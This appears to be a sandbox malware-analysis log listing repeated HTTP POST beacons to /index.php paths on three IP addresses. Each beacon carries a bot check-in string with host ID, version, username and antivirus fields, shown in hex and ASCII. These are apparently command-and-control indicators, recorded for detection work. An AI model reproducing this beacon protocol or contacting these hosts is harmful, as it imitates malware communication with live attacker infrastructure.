                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 30 31 34 30 30 31 26 75 6e 69 74 3d 38 35 33 33 32 31 39 33 35 32 31 32 Data Ascii: e0=1000014001&unit=853321935212
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
